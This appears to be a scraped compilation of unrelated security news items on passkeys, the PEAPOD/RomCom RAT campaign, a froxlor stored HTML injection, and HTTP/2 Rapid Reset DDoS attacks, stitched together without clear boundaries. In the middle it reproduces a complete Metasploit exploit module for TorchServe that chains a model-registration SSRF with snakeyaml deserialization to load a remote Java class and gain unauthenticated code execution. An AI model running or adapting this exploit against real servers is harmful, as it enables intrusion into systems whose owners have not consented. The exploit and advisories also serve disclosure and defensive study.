"We're seeing threat actors take advantage of a tremendously confusing environment by lying about what they can do and what they've accomplished, or 'almost' accomplished because they recognize that these things are hard to validate by experts," he said. “By making these dubious claims that linger in the open without being validated or invalidated, they can still have the intended effect. We anticipate we'll see a lot of that in the coming days, and it could potentially have adverse psychological effects."

Gaza Conflict Paves Way for Pro-Hamas Information Operations

Apple, Google, and Microsoft are promoting passkeys as a solution for accounts recovery, but enterprises are slow-walking their adoption.

The growing support for passkeys means consumers and small businesses finally have an easy-to-use technology for passwordless access to websites and cloud applications, but enterprises will likely not see a usable form of the technology for some time yet.

The passwordless authentication approach, based on the FIDO Alliance's WebAuthn standard, allows developers to leverage the user device's authentication technology — such as FaceID and fingerprint sensors — to log into cloud services and Web applications. While WebAuthn resulted in many implementations, which added significant complexity for consumers, passkeys are supported by major Internet firms — including Apple, Google, and Microsoft — which dramatically simplifies their use for consumers.

Yet that usability, which could extend to cloud-native small businesses, does not allow for the control and attestation necessary for passkeys in large corporations, says Jasson Casey, CEO of Beyond Identity. Instead, passkeys will likely develop into a optional factor in their current public key infrastructure (PKI) or credential-based system.

"I honestly think it's going to be a love child of passkeys and PKI that ultimately businesses need," Casey says. "The really cool thing about passkeys is the idea that there's a well-defined interface between a browser or user agent and an actual authenticator that manages credentials and keys."

Major companies have pushed passkeys as a more secure way to sign into online accounts. In June, Google began allowing companies to switch their Workspace users over to passkeys rather than using passwords. On Oct. 10, the company began giving users the ability to make passkeys the default option across their personal accounts, prompting them to make the switch when they sign in.

Apple and Microsoft have both added support for passkeys in their hardware and software, with iOS, Mac OS, and Windows 11 all supporting the technology.

For companies, passkeys could eliminate some of the cost of improving managing identity and improving authentication, says Steve Won, chief product officer at 1Password, an identity and password management firm.

"I'm really optimistic that enterprise adoption will be totally tenable within the next decade," Won says. "I've talked to so many businesses that are like, holy crap, \[passkeys are\] basically usable certificates or ... usable Yubikeys. Certificates are such a nightmare to be able to handle, and on the Yubikey side, nobody wants to be in the business of managing hardware."

**The End of Phishing?**

Done right, passkeys could eliminate phishing attacks aimed at harvesting credentials because there are no passwords to steal. The specification, which aims for interoperability among the largest identify providers, allow a user's device to attest to their identity, using private and public keys to then log the user into a service.

A major sticking point was the issue of recovering the keys when a device is lost, says Beyond Identity's Casey.

"A passkey is actually anchored in an enclave on my device, so if I throw that device in the ocean because — I don't even need a reason — and I go buy a new device, how do I log back in? That was viewed as a major stumbling block for the B2C \[business-to-consumer\] community," he says.

Apple, Google, and Microsoft fix this problem by tying the keys to their services. A user who logs back into one of the services can then recover by being issued a new set of keys.

Despite the promise of phishing resistance and doing away with shared secrets, businesses are still hesitant to commit to passkeys, says Andras Cser, vice president and principal analyst at Forrester Research.

"We still see zero to minimal adoption in the market," he says. "Service providers — \[such as\] retailers, healthcare orgs, \[and financial services\] companies — are concerned about device attestation and presence of the person authenticating."

**Companies Need More Than Passkeys**

The problems faced by enterprises are different. For companies, passkeys hold the promise of providing a standardized PKI as a way of interacting with online resources, as long as four requirements are met, says Casey. The system has to guarantee that keys cannot move; it solves the recovery problem for lost devices; it works across all sorts of devices, browsers, and online services; and it provides companies with centralized policy management for devices.

"An effective passkey system is going to have a distributed, automated PKI system under the hood that is providing similar security guarantees but without requiring you to actively manage the service ... regardless of whether the device is managed or BYOD devices," Casey says. "Classical PKI systems don't do any of that for you, not without a huge administrative burden."

While some small businesses may mandate the use of passkey, companies will more likely offer the technology as an authentication option for their customers.

**Another Zero-Trust Possibility**

If passkey providers and identity and access management (IAM) companies solve the enterprise-use problems of passkeys, they could take off in business. While consumers need easy-to-use services, companies can mandate that their employees use a specific technology, even if that technology has a learning curve or adds some steps to daily workflows, says Ian Hassard, senior director of product management at Okta, a single sign-on provider.

"If you look at customer identity being focused around balancing security and friction, because if you have too much friction, people don't buy your products," he says. "But in workforce identity, if you're managing your workforce, you have a bit more of a captive audience in the sense of, you can apply more friction to ensure a higher level of assurance and security."

Okta, for example, focuses on the management of identities, access privileges, and ensuring the user's device has the proper security controls in place and does not show signs of compromise, says Hassard. These are all foundational for a zero-trust approach to security.

"You want that assurance that the device is not compromised," he says. "Because obviously a lot of this technology is great until the client device is completely owned, and that's not a good thing."

Passkeys Are Cool, but They Aren't Enterprise-Ready

European Union military personnel and political leaders working on gender equality initiatives have emerged as the target of a new campaign that delivers an updated version of RomCom RAT called PEAPOD.
Cybersecurity firm Trend Micro attributed the attacks to a threat actor it tracks under the name Void Rabisu, which is also known as Storm-0978, Tropical Scorpius, and UNC2596, and is also

Endpoint Security / Cyber Attack

European Union military personnel and political leaders working on gender equality initiatives have emerged as the target of a new campaign that delivers an updated version of RomCom RAT called **PEAPOD**.

Cybersecurity firm Trend Micro attributed the attacks to a threat actor it tracks under the name Void Rabisu, which is also known as Storm-0978, Tropical Scorpius, and UNC2596, and is also believed to be associated with Cuba ransomware.

The adversarial collective is something of an unusual group in that it conducts both financial motivated and espionage attacks, blurring the line between their modes of operation. It's also exclusively linked to the use of RomCom RAT.

Attacks involving the use of the backdoor have singled out Ukraine and countries that support Ukraine in its war against Russia over the past year.

Earlier this July, Microsoft implicated Void Rabisu to the exploitation of CVE-2023-36884, a remote code execution flaw in Office and Windows HTML, by using specially-crafted Microsoft Office document lures related to the Ukrainian World Congress.

RomCom RAT is capable of interacting with a command-and-control (C&C) server to receive commands and execute them on the victim's machine, while also packing in defense evasion techniques, marking a steady evolution in its sophistication.

The malware is typically distributed via highly targeted spear-phishing emails and bogus ads on search engines like Google and Bing to trick users into visiting lure sites hosting trojanized versions of legitimate applications.

"Void Rabisu is one of the clearest examples where we see a mix of the typical tactics, techniques, and procedures (TTPs) used by cybercriminal threat actors and TTPs used by nation-state-sponsored threat actors motivated primarily by espionage goals," Trend Micro said.

The latest set of attacks detected by the company in August 2023 also deliver RomCom RAT, only it's an updated and slimmed-down iteration of the malware that's distributed via a website called wplsummit\[.\]com, which is a replica of the legitimate wplsummit\[.\]org domain.

Present on the website is a link to a Microsoft OneDrive folder that hosts an executable named "Unpublished Pictures 1-20230802T122531-002-sfx.exe," a 21.6 MB file that aims to mimic a folder containing photos from the Women Political Leaders (WPL) Summit that took place in June 2023.

The binary is a downloader that drops 56 pictures onto the target system as a decoy, while retrieving a DLL file from a remote server. These photos are said to have been sourced by the malicious actor from individual posts on various social media platforms such as LinkedIn, X (formerly known as Twitter), and Instagram.

The DLL file, for its part, establishes contact with another domain to fetch the third-stage PEAPOD artifact, which supports 10 commands in total, down from 42 commands supported by its predecessor.

The revised version is equipped to execute arbitrary commands, download and upload files, get system information, and even uninstall itself from the compromised host. By stripping down the malware to the most essential features, the idea is to limit its digital footprint and complicate detection efforts.

"While we have no evidence that Void Rabisu is nation-state-sponsored, it's possible that it is one of the financially motivated threat actors from the criminal underground that got pulled into cyberespionage activities due to the extraordinary geopolitical circumstances caused by the war in Ukraine," Trend Micro said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New PEAPOD Cyberattack Campaign Targeting Women Political Leaders

The PyTorch model server contains multiple vulnerabilities that can be chained together to permit an unauthenticated remote attacker arbitrary Java code execution. The first vulnerability is that the management interface is bound to all IP addresses and not just the loop back interface as the documentation suggests. The second vulnerability (CVE-2023-43654) allows attackers with access to the management interface to register MAR model files from arbitrary servers. The third vulnerability is that when an MAR file is loaded, it can contain a YAML configuration file that when deserialized by snakeyaml, can lead to loading an arbitrary Java class.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/zip'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Java  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::Java::HTTP::ClassLoader  def initialize(_info = {})    super(      'Name' => 'PyTorch Model Server Registration and Deserialization RCE',      'Description' => %q{          The PyTorch model server contains multiple vulnerabilities that can be chained together to permit an        unauthenticated remote attacker arbitrary Java code execution. The first vulnerability is that the management        interface is bound to all IP addresses and not just the loop back interface as the documentation suggests. The        second vulnerability (CVE-2023-43654) allows attackers with access to the management interface to register MAR        model files from arbitrary servers. The third vulnerability is that when an MAR file is loaded, it can contain a        YAML configuration file that when deserialized by snakeyaml, can lead to loading an arbitrary Java class.      },      'Author' => [        'Idan Levcovich', # vulnerability discovery and research        'Guy Kaplan', # vulnerability discovery and research        'Gal Elbaz', # vulnerability discovery and research        'Swapneil Kumar Dash', # snakeyaml deserialization research        'Spencer McIntyre' # metasploit module      ],      'References' => [        [ 'URL', 'https://www.oligo.security/blog/shelltorch-torchserve-ssrf-vulnerability-cve-2023-43654' ],        [ 'CVE', '2023-43654' ], # model registration SSRF        [ 'URL', 'https://github.com/pytorch/serve/security/advisories/GHSA-8fxr-qfr9-p34w' ],        [ 'CVE', '2022-1471' ], # snakeyaml deserialization RCE        [ 'URL', 'https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2' ],        [ 'URL', 'https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in' ],        [ 'URL', 'https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858' ]      ],      'DisclosureDate' => '2023-10-03',      'License' => MSF_LICENSE,      'DefaultOptions' => {        'RPORT' => 8081      },      'Targets' => [        [          'Automatic', {            'Platform' => 'java',            'Arch' => [ARCH_JAVA]          }        ],      ],      'Notes' => {        'Stability' => [CRASH_SAFE],        'SideEffects' => [IOC_IN_LOGS],        'Reliability' => [REPEATABLE_SESSION]      }    )  end  def check    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'api-description'))    return Exploit::CheckCode::Unknown unless res    return Exploit::CheckCode::Safe unless res.code == 200    unless res.get_json_document.dig('info', 'title') == 'TorchServe APIs'      return Exploit::CheckCode::Safe('The TorchServe API was not detected on the target.')    end    version = res.get_json_document.dig('info', 'version')    return Exploit::CheckCode::Detected unless version.present?    unless Rex::Version.new(version) < Rex::Version.new('8.0.2')      return Exploit::CheckCode::Safe("Version #{version} is patched.")    end    Exploit::CheckCode::Appears("Version #{version} is vulnerable.")  end  def class_name    'MyScriptEngineFactory'  end  def constructor_class    ::File.binread(::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-1471', "#{class_name}.class"))  end  def on_request_uri(cli, request)    if request.relative_resource.end_with?("#{@model_name}.mar")      print_good('Sending model archive')      send_response(cli, generate_mar, { 'Content-Type' => 'application/octet-stream' })      return    end    if request.relative_resource.end_with?('services/javax.script.ScriptEngineFactory')      vprint_good('Sending ScriptEngineFactory class name')      send_response(cli, class_name, { 'Content-Type' => 'application/octet-string' })      return    end    super(cli, request)  end  def generate_mar    config_file = rand_text_alphanumeric(8..15) + '.yml'    serialized_file = rand_text_alphanumeric(8..15) + '.pt'    mri = Rex::Zip::Archive.new    mri.add_file(serialized_file, '') # an empty data file is sufficient for exploitation    mri.add_file('MAR-INF/MANIFEST.json', JSON.generate({      'createdOn' => (Time.now - Random.rand(600..1199)).strftime('%d/%m/%Y %H:%M:%S'), # forge a timestamp of 10-20 minutes ago      'runtime' => 'python',      'model' => {        'modelName' => @model_name,        'serializedFile' => serialized_file,        'handler' => %w[image_classifier object_detector text_classifier image_segmenter].sample,        'modelVersion' => '1.0',        'configFile' => config_file      },      'archiverVersion' => '0.8.2'    }))    mri.add_file(config_file, %( !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["#{get_uri}/"]]]] ))    mri.pack  end  def exploit    start_service    @model_name = rand_text_alphanumeric(8..15)    print_status('Registering the model archive...')    # see: https://pytorch.org/serve/management_api.html#register-a-model    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'models'),      'vars_get' => { # *must* be vars_get and not vars_post!        'url' => "#{get_uri}#{@model_name}.mar"      }    })    handler  end  def cleanup    super    return unless @model_name    # see: https://pytorch.org/serve/management_api.html#unregister-a-model    send_request_cgi({      'method' => 'DELETE',      'uri' => normalize_uri(target_uri.path, 'models', @model_name, '1.0')    })  endend

PyTorch Model Server Registration / Deserialization Remote Code Execution

Cross-site Scripting (XSS) - Stored in GitHub repository froxlor/froxlor prior to 2.0.22.

**Description**

Stored HTML Injection: A Hidden Web Threat. Learn how attackers exploit input fields to inject malicious code into web applications, jeopardizing user data and site integrity. Discover crucial prevention measures to safeguard against this insidious vulnerability.

#Step to reproduce

      1. Login to froxlor as admin
      2. Under the resource go to Hosting plans  and Add new plan  
      3. In the plan name field  add the HTML payload and save it  
      4. once after saving the plan we can see that  the payload is working 
    

**Proof of Concept**

    https://drive.google.com/file/d/1zAKGmVoxwmzXZbi6S4TZs9ZA3A7VhXxJ/view?usp=sharing
    
    

**Impact**

The impact of stored HTML injection can be severe and far-reaching, affecting both website owners and their users. Here are some of the key impacts:

Compromised User Data: Stored HTML injection allows attackers to access and manipulate sensitive user data stored in the application's database. This can include personal information, passwords, financial details, and other confidential data, leading to identity theft and fraud.

Malicious Code Execution: Attackers can inject harmful scripts into the web application, leading to the execution of arbitrary code on users' browsers. This can result in unauthorized actions, data theft, or the installation of malware on users' devices.

Loss of Trust: When users' data is compromised due to stored HTML injection, it erodes their trust in the website and the organization behind it. Loss of trust can lead to a decline in user engagement, decreased customer loyalty, and damage to the company's reputation.

Financial Loss: A successful attack can have financial repercussions, including costs associated with data breaches, legal liabilities, and the expenses of recovering and securing the compromised system.

Business Disruption: If a website is affected by stored HTML injection, it may become inaccessible or experience performance issues, leading to a disruption in services and potential loss of revenue.

Regulatory Compliance Issues: Depending on the nature of the compromised data, organizations may face legal consequences and regulatory penalties for failing to protect user information adequately.

Negative SEO Impact: A compromised website may be used to host malicious content, leading search engines to flag the site as unsafe, resulting in a negative impact on its search engine rankings.

Long-term Damage: The aftermath of a successful stored HTML injection attack can be long-lasting. Rebuilding user trust and restoring the website's reputation can be a time-consuming and challenging process

CVE-2023-4829: Stored HTML injection in froxlor

Dubbed “HTTP/2 Rapid Reset,” the flaw requires issuing patches to virtually every web server around the world before the problem can be eradicated.

Google, Amazon, Microsoft, and Cloudflare revealed this week that they battled massive, record-setting distributed denial of service attacks against their cloud infrastructure in August and September. DDoS attacks, in which attackers attempt to overwhelm a service with junk traffic to bring it down, are a classic internet menace, and hackers are always developing new strategies to make them bigger or more effective. The recent attacks were particularly noteworthy, though, because hackers generated them by exploiting a vulnerability in a foundational web protocol. This means that while patching efforts are well underway, fixes will need to essentially reach every web server globally before these attacks can be fully stamped out.

Dubbed “HTTP/2 Rapid Reset,” the vulnerability can only be exploited for denial of service—it doesn't allow attackers to remotely take over a server or exfiltrate data. But an attack doesn't need to be fancy to cause major problems—availability is vital for access to any digital service, from critical infrastructure to crucial information.

“DDoS attacks can have wide-ranging impacts to victim organizations, including loss of business and unavailability of mission-critical applications,” Google Cloud's Emil Kiner and Tim April wrote this week. “Time to recover from DDoS attacks can stretch well beyond the end of an attack.”

Another facet of the situation is where the vulnerability came from. Rapid Reset isn't in a particular piece of software but in the specification for the HTTP/2 network protocol used for loading webpages. Developed by the Internet Engineering Task Force (IETF), HTTP/2 has been around for about eight years and is the faster, more efficient successor to the classic internet protocol HTTP. HTTP/2 works better on mobile and uses less bandwidth, so it has been extremely widely adopted. IETF is currently developing HTTP/3.

“Because the attack abuses an underlying weakness in the HTTP/2 protocol, we believe any vendor that has implemented HTTP/2 will be subject to the attack,” Cloudflare's Lucas Pardue and Julien Desgats wrote this week. Though it seems that there are a minority of implementations that are not impacted by Rapid Reset, Pardue and Desgats emphasize that the problem is broadly relevant to "every modern web server.”

Unlike a Windows bug that gets patched by Microsoft or a Safari bug that gets patched by Apple, a flaw in a protocol can't be fixed by one central entity because each website implements the standard in its own way. When major cloud services and DDoS-defense providers create fixes for their services, it goes a long way toward protecting everyone who uses their infrastructure. But organizations and individuals running their own web servers need to work out their own protections.

Dan Lorenc, a longtime open source software researcher and CEO of the software supply chain security company ChainGuard, points out that the situation is an example of a time when the availability of open source and the prevalence of code reuse (versus always building everything from scratch) is an advantage, because many web servers have likely copied their HTTP/2 implementation from somewhere else rather than reinvent the wheel. If these projects are maintained, they will develop Rapid Reset fixes that can proliferate out to users.

It will take years to reach full adoption of these patches, though, and there will still be some services that did their own HTTP/2 implementation from scratch and don't have a patch coming from anywhere else.

“It's important to note that the big tech companies discovered this while it was being actively exploited,” Lorenc says. “It can be used to take a service down like operational tech or industrial control. That’s scary.”

Though the string of recent DDoS attacks on Google, Cloudflare, Microsoft, and Amazon raised the alarm for being so large, the companies were ultimately able to repel the attacks, which didn't cause lasting damage. But just by carrying out the assaults, hackers revealed the existence of the protocol vulnerability and how it could be exploited—a cause and effect known in the security community as “burning a zero day.” Even though the patching process will take time, and some web servers will remain vulnerable long term, the internet is safer now than if attackers hadn't shown their cards by exploiting the flaw.

“A bug like this in the standard is unusual, it's a novel vulnerability and was a valuable finding for whoever first discovered it,” Lorenc says. “They could have saved it or even probably sold it for a lot of money. I'm always going to be curious about the mystery of why someone decided to burn this one.”

Tag

#google